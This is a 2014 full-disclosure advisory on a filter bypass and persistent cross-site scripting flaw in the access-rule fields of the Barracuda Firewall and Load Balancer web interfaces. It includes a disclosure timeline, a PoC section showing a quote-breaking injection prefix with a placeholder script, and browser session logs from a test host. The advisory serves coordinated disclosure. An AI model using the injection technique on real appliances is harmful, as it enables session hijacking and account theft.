[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] (BNSEC-1263) Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 #37 - Fil
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-07-29 11:37:22
Message-ID: 53D78772.8020600 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 #37 - Filter Bypass & \
Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1103
Barracuda Networks Security ID (BNSEC): BNSEC-1263
https://www.barracuda.com/support/knowledgebase/501600000013gvr
Solution #00006523
BNSEC-01263: Authenticated persistent XSS in Barracuda Load Balancer v4.2.2
Release Date:
=============
2014-07-28
Vulnerability Laboratory ID (VL-ID):
====================================
1103
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by providing powerful \
network security, granular layer 7 application controls, user awareness and secure VPN \
connectivity combined with cloud-based malware protection, content filtering and reporting. It \
alleviates the performance bottlenecks in Unified Threat Management (UTM) appliances through \
intelligent integration of on-premise and cloud-based technologies. While the powerful on- \
premises appliance is optimized for tasks like packet forwarding and routing, Intrusion \
Prevention (IPS), DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like \
virus scanning, content filtering and usage reporting benefit from the scalable performance \
and elasticity of the cloud.
(Copy o the Vendor Homepage: https://www.barracuda.com/products/firewall )
The Barracuda Load Balancer ADC is ideal for organizations looking for a high-performance, yet \
cost-effective application delivery and security solution. With the broadest range of hardware \
and virtual models, the Barracuda Load Balancer ADC provides maximum flexibility for \
organizations looking to build highly secure and scalable application infrastructure, whether \
it's deployed on-premises or in the cloud.
(Copy o the Vendor Homepage: https://www.barracuda.com/products/loadbalancer )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent vulnerabilities in \
the Barracuda Networks Firewall v6.1.0.016 & Loadbalancer v4.2.2 Application.
Vulnerability Disclosure Timeline:
==================================
2013-09-30: Researcher Notification & Coordination (Benjamin Kunz Mejri & Ebrahim Hegazy)
2013-10-01: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-11-29: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-07-14: Vendor Fix/Patch (Barracuda Networks Developer Team)
2014-07-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Firewall Appliance Web-Application v6.1.0.016, v6.1.2, v6.1.5 - x100 x200 x300 x400 \
x500 x600 & Vx
Barracuda Networks
Product: Load Balancer Appliance Web-Application v4.2.2 & Vx
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Barracuda \
Networks Firewall v6.1.0.016 & Loadbalancer v4.2.2 Application. The vulnerability allows remote \
attackers to implement via inject own malicious persistent (application side) script codes to \
the online-service module.
The vulnerabilities are located in the `Firewall > Firewall Rules > Custom Firewall Access \
Rules > Access Rules` module. Attackers are able to inject via POST method request through the \
`ip address` or `redirect to` values own malicious script codes. The attack vector is \
persistent on the application-side of the service and the request method to inject is POST.The \
local privileged barracuda user account can inject own malicious context by usage of the `ip` \
and `redirect` to input fields. The execution of the script code after the inject occurs in the \
same `item listing` after processing to add.
The input fields have an input filter restriction which can be bypassed by direct manipulation \
of the POST method request via live session tamper. The vulnerable module input form with the \
restriction notifies the user by a red highlighted status message. The attacker only needs to \
click twice the service plus button to bypass the validation mechanism and can at the end add \
the own malicious context. The script code executes on the application-side of the barracuda \
network firewall and loadbalancer appliance application.
The security risk of the bypass and persistent input validation vulnerabilities are estimated \
as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the \
persistent web vulnerability requires low user interaction and a local privileged \
web-application account. Successful exploitation of the vulnerability can lead to persistent \
session hijacking (customers), account steal via persistent web attacks, persistent phishing or \
persistent manipulation of module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall > Firewall Rules > Custom Firewall Access Rules > Access Rules
Vulnerable Input Field(s):
[+] Source & Destination > IP Address
[+] Source & Destination > Redirect to
Vulnerable Parameter(s):
[+] value
Affected Module(s):
[+] Ip Listing
[+] Redirect Information Listing (buttom)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with \
low privileged application user account and low user interaction. For security demonstration \
or to reproduce the security vulnerability follow the provided information and steps below to \
continue.
PoC: Firewall > Firewall Rules > Custom Firewall Access Rules > Access Rules (Source & \
Destination) - IP & Redirect to
<table class="config_module_inner" summary="Config Module" cellpadding="0" cellspacing="0" \
width="100%"> <tbody id="dst_net_ip_obj_radio">
<tr class="config_module_tr" id="config_module_row_1">
<td colspan="2" valign="top" width="100"><span class="nowrap"><input autocomplete="off"
checked="checked" id="fw_access_rule_dst_net_type:IP Addresses" \
name="fw_access_rule_dst_net_type" onclick="switch_dst_mode(this.value)" value="IP Addresses" \
type="radio"><label for="fw_access_rule_dst_net_type:IP Addresses">IP Address</label></span> \
​<span class="nowrap"> <input autocomplete="off" id="fw_access_rule_dst_net_type:Network \
Objects" name="fw_access_rule_dst_net_type" onclick="switch_dst_mode(this.value)" \
value="Network Objects" type="radio"><label for="fw_access_rule_dst_net_type:Network \
Objects">Network Objects</label></span> ​</td> </tr></tbody>
<tbody>
<tr class="config_module_tr" id="config_module_row_2">
<td colspan="2" valign="top" width="100"><table class="config_module" frame="box" \
id="dst_inclist" rules="none" style="border:none;" summary="Box" cellpadding="0" \
cellspacing="0"> <tbody><tr><td><input value="'">>"<[PERSISTENT INJECTED SCRIPT CODE!]> <"
data-tooltip-linked="2" class="field-error" autocomplete="off" \
data-displayfield="fw_access_rule_dst_inc" id="JS_fw_access_rule_dst_inc_single" \
name="UPDATE_fw_access_rule_dst_inc_single" style="width:180px;" type="text"></td><td><input \
class="new_button" id="add_dst_inc_button" name="+" onclick="add_dst_inc_pattern(1);" \
value="+" type="button"></td></tr><tr style="display: none;"><td><select disabled="" \
autocomplete="off" id="dst_nobjs_inc" name="dst_nobjs_inc" style="width:180px;"><option \
selected="selected" title="All IPv4 addresses.
Include: 0.0.0.0/0" value="Any">Any</option><option title="All routed IPv4 addresses.
Include: Any
Exclude: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16" value="Internet">Internet</option><option \
title="All network addresses that have a Trusted classification. This automatically applies to \
the management network.
Include: Trusted LAN Networks, Trusted Next-Hop Networks" value="Trusted LAN">Trusted \
LAN</option><option title="Assigned local IP for an established UMTS link" value="3G Local \
IP">3G Local IP</option><option title="All Addresses configured or dynamically assigned on the \
Firewall
Include: Management IP, Service IPs, DHCP1 Local IP, DHCP2 Local IP, DHCP3 Local IP, ..." \
value="All Firewall IPs">All Firewall IPs</option> <option title="IP addresses of all servers \
used for Active Directory type authentication" value="Auth-ACTDIR">Auth-ACTDIR</option> <option \
title="IP addresses of all servers used for LDAP type authentication" \
value="Auth-LDAP">Auth-LDAP</option><option title="IP addresses of all servers used for MSNT \
type authentication" value="Auth-MSNT">Auth-MSNT</option><option title="IP addresses of all \
servers used for RADIUS type authentication" value="Auth-RADIUS">Auth-RADIUS</option><option \
title="IP addresses of all servers used for RSA-SecureID type authentication" \
value="Auth-RSASecureID">Auth-RSASecureID</option><option title="Include: 205.158.110.60, \
216.129.105.0/24, 216.129.125.192/26, 209.124.61.96/27, 209.124.62.64/27, ..." \
value="Barracuda Update Servers">Barracuda Update Servers</option><option title="Assigned local \
IP for established DHCP based link on dhcp1" value="DHCP1 Local IP">DHCP1 Local \
IP</option><option title="Assigned local IP for established DHCP based link on dhcp2" \
value="DHCP2 Local IP">DHCP2 Local IP</option><option title="Assigned local IP for established \
DHCP based link on dhcp3" value="DHCP3 Local IP">DHCP3 Local IP</option><option \
title="Assigned local IP for established DHCP based link on dhcp4" value="DHCP4 Local IP"> \
DHCP4 Local IP</option><option title="Assigned local IP for established DHCP based link on \
dhcp5" value="DHCP5 Local IP">DHCP5 Local IP</option> <option title="Assigned local IP for \
established DHCP based link on dhcp6" value="DHCP6 Local IP">DHCP6 Local IP</option> <option \
title="All networks classified as DMZ" value="DMZ Networks">DMZ Networks</option><option \
title="IP addresses of master servers used by the firewall for DNS zone transfers" value="DNS \
Master Server">DNS Master Server</option><option title="IP addresses of servers used by the \
firewall for DNS queries" value="DNS Servers">DNS Servers</option><option title="Assigned local \
IP for established DSL link through ppp1" value="DSL1 Local IP">DSL1 Local IP</option><option \
title="Assigned local IP for established DSL link through ppp2" value="DSL2 Local IP"> DSL2 \
Local IP</option><option title="Assigned local IP for established DSL link through ppp3" \
value="DSL3 Local IP">DSL3 Local IP</option> <option title="Assigned local IP for established \
DSL link through ppp4" value="DSL4 Local IP">DSL4 Local IP</option> <option title="All locally \
attached static networks
Include: 0.0.0.0/0" value="Local Networks">Local Networks</option><option title="The firewall's \
management IP address
Include: 192.168.200.200" value="Management IP">Management IP</option><option title="IP \
addresses of servers used by the firewall for NTP time synchronisation" value="NTP Time \
Server">NTP Time Server</option><option title="Include: 0.0.0.0/0 (p1)" \
value="Port-p1">Port-p1</option> <option title="Include: 0.0.0.0/0 (p2)" \
value="Port-p2">Port-p2</option><option title="Include: 0.0.0.0/0 (p3)" \
value="Port-p3">Port-p3</option> <option title="Include: 0.0.0.0/0 (p4)" \
value="Port-p4">Port-p4</option><option title="Private class A network.
Include: 10.0.0.0/8" value="Private 10">Private 10</option><option title="16 private class B \
networks.
Include: 172.16.0.0/12" value="Private 172">Private 172</option><option title="Private class B \
network.
Include: 192.168.0.0/16" value="Private 192">Private 192</option><option title="Root DNS server \
addresses
Include: 198.41.0.4, 128.9.0.107, 192.33.4.112, 128.8.10.90, 192.203.230.10, ..." value="Root \
DNS">Root DNS</option> <option title="All configured server IP addresses
Include: 127.0.0.9" value="Service IPs">Service IPs</option><option title="All trusted local \
area networks
Include: 0.0.0.0/0" value="Trusted LAN Networks">Trusted LAN Networks</option><option \
title="All trusted networks that are reachable through a next-hop." value="Trusted Next-Hop \
Networks">Trusted Next-Hop Networks</option></select></td> <td><input disabled="" \
class="new_button" id="add_dst_inc_button" name="+" onclick="add_dst_inc_pattern(1);" value="+" \
type="button"></td></tr>
<tr class="network"><td>'">>" >"<[PERSISTENT INJECTED SCRIPT CODE!]></td>
<td><input class="new_button" value="-" name="incip^'">>"<[PERSISTENT INJECTED SCRIPT CODE!])
[PERSISTENT INJECTED SCRIPT CODE!]> <" type="button"></td></tr></tbody></table></td>
</tr>
</tbody>
<tbody id="redir_redirected_to_select" style="display:none">
<tr class="config_module_tr" id="config_module_row_3">
<td valign="top" width="100"> </td>
<td valign="top"> </td>
</tr>
<tr class="config_module_tr" id="config_module_row_4">
<td valign="top" width="100">Redirected To:</td>
<td valign="top"><select disabled="" autocomplete="off" \
id="UPDATE_new_fw_access_rule_redir_to" name="UPDATE_new_fw_access_rule_redir_to" \
onchange="update_redir_to_info(this.value);" style=""><option selected="selected" \
value="Caching DNS">Caching DNS</option><option value="SIP">SIP</option><option \
value="Proxy">Proxy</option><option value="NTP"> NTP</option><option \
value="VPN">VPN</option><option value="SSL VPN">SSL VPN</option></select></td> </tr>
</tbody>
<tbody>
</tbody>
<tbody id="redir_redirected_to_ip_input" style="display:none">
<tr class="config_module_tr" id="config_module_row_5">
<td valign="top" width="100"> </td>
<td valign="top"> </td>
</tr>
<tr class="config_module_tr" id="config_module_row_6">
<td valign="top" width="100">Redirected To:</td>
<td valign="top"><input disabled="" autocomplete="off" \
id="UPDATE_new_fw_access_rule_redir_to" name="UPDATE_new_fw_access_rule_redir_to" \
type="text"></td> </tr>
</tbody>
<tbody>
</tbody>
</table>
--- PoC Session Logs Request/Response [GET|POST] ---
2:35:05.529[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.529[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.530[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.1.0.016 \
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.530[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.531[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.532[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.533[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.534[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/slider.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.535[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.536[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.537[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.537[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.538[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.556[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:05.613[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:05.654[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.655[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.944[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/loading-spinner.gif Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.945[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/boxnet-spinner.gif Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.945[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/ha-spinner.gif Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:05.948[308ms][total 308ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/header_logo.cgi?6.1.0.016 Load \
Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/png] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[image/png]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Tue, 01 Oct 2013 00:35:06 GMT]
Date[Tue, 01 Oct 2013 00:35:06 GMT]
Cache-Control[no-cache, no-store]
2:35:06.103[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/loading_anim.gif Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.104[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenON_yellowON.png Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.105[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenOFF_yellowOFF.png Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.106[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenON_yellowOFF.png Load \
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:06.146[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/green.png Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016]
2:35:06.146[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/meter_bg.gif Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/progress.css?v=6.1.0.016]
2:35:06.148[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/meter_g.gif Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/progress.css?v=6.1.0.016]
2:35:07.285[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?ajax_action=build_status_expiration_display_content&jsonp=update_subscription_module&locale=en_US \
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
2:35:09.169[1999ms][total 4455ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[64957] Mime \
Type[text/html] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Mon, 01 Oct 2012 00:35:11 GMT]
Date[Tue, 01 Oct 2013 00:35:11 GMT]
Content-Length[64957]
2:35:11.270[0ms][total 0ms] Status: pending[]
